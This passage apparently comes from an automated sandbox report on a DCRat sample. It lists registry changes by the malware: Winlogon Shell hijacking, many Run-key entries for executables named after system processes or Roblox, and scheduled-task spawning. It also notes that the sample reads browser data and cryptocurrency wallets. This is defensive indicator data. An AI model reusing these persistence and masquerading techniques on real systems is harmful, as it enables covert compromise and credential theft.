Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Event Triggered Execution: AppInit DLLs
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\winNet\\spoolsv.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
